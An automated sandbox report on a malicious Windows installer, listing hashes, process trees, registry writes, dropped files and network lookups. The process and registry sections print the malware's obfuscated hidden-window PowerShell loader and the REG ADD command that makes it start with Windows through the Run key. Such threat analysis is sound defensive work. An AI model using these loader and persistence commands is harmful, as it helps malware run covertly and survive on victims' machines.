File name:

098765456789.exe

Full analysis: https://app.any.run/tasks/c82e97da-96c7-4687-8a64-0b8b920830b7
Verdict: Malicious activity
Analysis date: May 23, 2024, 05:42:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:

C3300BF4583BAB1294FDC76DC40FC8FC

SHA1:

FB49582F3FC1CD31417D2CE8B6FEBA053CCD1A0D

SHA256:

56930A32806C50B82146EF0B6557E3B6C8B3D82F28B25C4392E712536AE98204

SSDEEP:

24576:zBDttv+bm6Oi6CgTB9kyzGgkRPRK76DVFh6CTDFDkQVgqE:zBDttvGm6OnCgTB9kyigkRPRK76DVFhe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • 098765456789.exe (PID: 3968)
      • powershell.exe (PID: 2364)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2364)
    • Changes the autorun value in the registry

      • reg.exe (PID: 992)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2364)
      • Synagoges.exe (PID: 1960)
    • Starts POWERSHELL.EXE for commands execution

      • 098765456789.exe (PID: 3968)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 2364)
    • Evaluates numerical expressions in cmd (potential data obfuscation)

      • powershell.exe (PID: 2364)
    • Gets information about processes (POWERSHELL)

      • powershell.exe (PID: 2364)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 2364)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2364)
    • Reads the Internet Settings

      • Synagoges.exe (PID: 1960)
    • Reads security settings of Internet Explorer

      • Synagoges.exe (PID: 1960)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2624)
  • INFO

    • Checks supported languages

      • 098765456789.exe (PID: 3968)
      • Synagoges.exe (PID: 1960)
    • Reads the computer name

      • 098765456789.exe (PID: 3968)
      • Synagoges.exe (PID: 1960)
    • Create files in a temporary directory

      • 098765456789.exe (PID: 3968)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2364)
    • Creates files or folders in the user directory

      • 098765456789.exe (PID: 3968)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2364)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2364)
    • The executable file from the user directory is run by the Powershell process

      • Synagoges.exe (PID: 1960)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2364)
    • Reads the machine GUID from the registry

      • Synagoges.exe (PID: 1960)
    • Checks proxy server information

      • Synagoges.exe (PID: 1960)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2364)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:12:16 00:50:29+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 25088
InitializedDataSize: 3782656
UninitializedDataSize: 1024
EntryPoint: 0x3248
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 3.2.0.0
ProductVersionNumber: 3.2.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: overtimers
FileDescription: planometry
InternalName: semirelief.exe
OriginalFileName: semirelief.exe
ProductName: klasseundervisningernes
ProductVersion: 3.2.0.0
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
6
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start 098765456789.exe no specs powershell.exe cmd.exe no specs synagoges.exe no specs cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
992REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Halvdagsbeskftigelsers% -windowstyle minimized $Liquorishly=(Get-ItemProperty -Path 'HKCU:\Vandrelav\').Indstiftelser;%Halvdagsbeskftigelsers% ($Liquorishly)"C:\Windows\System32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1072"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1960"C:\Users\admin\AppData\Local\Temp\Synagoges.exe"C:\Users\admin\AppData\Local\Temp\Synagoges.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
planometry
Modules
Images
c:\windows\system32\mshtml.dll
c:\users\admin\appdata\local\temp\synagoges.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2364"powershell.exe" -windowstyle hidden "$Krumspring=Get-Content 'C:\Users\admin\AppData\Roaming\fertiliseringer\Acidise.Rin';$Delebrn=$Krumspring.SubString(50256,3);.$Delebrn($Krumspring)"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
098765456789.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2624"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Halvdagsbeskftigelsers% -windowstyle minimized $Liquorishly=(Get-ItemProperty -Path 'HKCU:\Vandrelav\').Indstiftelser;%Halvdagsbeskftigelsers% ($Liquorishly)"C:\Windows\System32\cmd.exeSynagoges.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3968"C:\Users\admin\Desktop\098765456789.exe" C:\Users\admin\Desktop\098765456789.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
planometry
Exit code:
4294967295
Modules
Images
c:\users\admin\desktop\098765456789.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
Total events
5 612
Read events
5 368
Write events
202
Delete events
42

Modification events

(PID) Process:(3968) 098765456789.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{93412589-74D4-4E4E-AD0E-E0CB621440FD} {000214E6-0000-0000-C000-000000000046} 0xFFFF
Value:
01000000000000005AC3AFF8D3ACDA01
(PID) Process:(3968) 098765456789.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3968) 098765456789.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:@fontext.dll,-8007
Value:
Font settings
(PID) Process:(1960) Synagoges.exeKey:HKEY_CURRENT_USER\Vandrelav
Operation:writeName:Indstiftelser
Value:
$Krumspring=Get-Content 'C:\Users\admin\AppData\Roaming\fertiliseringer\Acidise.Rin';$Delebrn=$Krumspring.SubString(50256,3);.$Delebrn($Krumspring)
(PID) Process:(1960) Synagoges.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1960) Synagoges.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1960) Synagoges.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1960) Synagoges.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1960) Synagoges.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:Halvdagsbeskftigelsers
Value:
c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:(992) reg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Startup key
Value:
%Halvdagsbeskftigelsers% -windowstyle minimized $Liquorishly=(Get-ItemProperty -Path 'HKCU:\Vandrelav\').Indstiftelser;%Halvdagsbeskftigelsers% ($Liquorishly)
Executable files
1
Suspicious files
17
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Acidise.Rintext
MD5:176FFC95F51763144980E0054FC5EDC6
SHA256:41F17F6B287D5F9F9C1571B823E0EEDD5FCD27B14FFE80B565D2ABBB99D11512
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Elfhood\philopornist.antbinary
MD5:3F28B68878DB110B099C2AA9285ABEC7
SHA256:2A775985173B2EC6CDC5BEA576D6B10F35D852A03EDF5C788DCC1C7403538394
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Elfhood\Indgribendes\retsforflgendes.todbinary
MD5:769A586950947968C2FBC99368DEAAF7
SHA256:90D3B049131C3D1B4D73483D0BC10D3DBFB6E1717566D750C08208B6854C3A01
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Elfhood\puntout.umobinary
MD5:A320CC2234BE62AD508B3CE096AB6C18
SHA256:1538A9E707E2CE997E88A7DB8639819F27B4F4173BF5EB33F8EA8619975A7700
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\computerbrugeres.stsbinary
MD5:7A362FEC7FE89A2BFF10F4CE7DB4168E
SHA256:E8E5CC5E7AC2564E58A619F93B4F0A2CDB84B6F8940EC42B808E6ACA4517005A
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Elfhood\quizdeltagerne.klebinary
MD5:F8BC1702E49C38114F0562877FAF6734
SHA256:3E87E729E1234916E3F7AF4D4482CDFD2609DDE14A546368F04754818033AF85
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Deagol.lynbinary
MD5:F01C9151A434D50C2BC0A02EEAB55643
SHA256:AA75AD97A7B1714CD4908B3349DDFF92AD6CCB3CCC00E5E85D362CC820CBFB9B
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Betnksomst.sirbinary
MD5:13562D161E0932E108EEEC7A9A080CC4
SHA256:A208A8F361E56DCC29AC934C293FE16EB3D8228621CCF4C414555899BB74C782
3968098765456789.exeC:\Users\admin\AppData\Roaming\fertiliseringer\Hjemlaante\hydrolytisk.cunbinary
MD5:DF35D40A84AFCB121969409BC40F79D4
SHA256:82B0E73A730C6791CFB20F24499FC915A95CECD40F86A0A651D0990A96552130
3968098765456789.exeC:\Users\admin\AppData\Local\Temp\acrometer.initext
MD5:E4E43E6724DF47009F84EA08F72ABE1B
SHA256:4D5734BD9C25A985E2185B77944F55461F7151F4E234C6B8D35DE32F546A625A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
134
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
unknown
4
System
192.168.100.255:138
unknown
1088
svchost.exe
224.0.0.252:5355
unknown

DNS requests

Domain
IP
Reputation
www.vibrantbhutan.com
unknown
dns.msftncsi.com
  • 131.107.255.255
unknown

Threats

No threats detected
No debug info